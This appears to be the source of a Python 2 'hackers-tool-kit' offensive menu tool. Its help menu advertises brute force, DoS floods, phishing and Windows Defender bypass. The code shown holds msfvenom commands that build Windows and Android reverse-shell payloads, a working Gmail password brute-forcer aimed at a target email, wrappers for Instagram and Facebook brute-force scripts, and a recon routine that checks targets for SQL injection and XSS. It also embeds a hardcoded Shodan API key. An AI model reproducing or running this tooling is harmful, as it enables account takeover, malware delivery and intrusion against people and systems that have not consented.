░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """\033[91m +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,8) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + 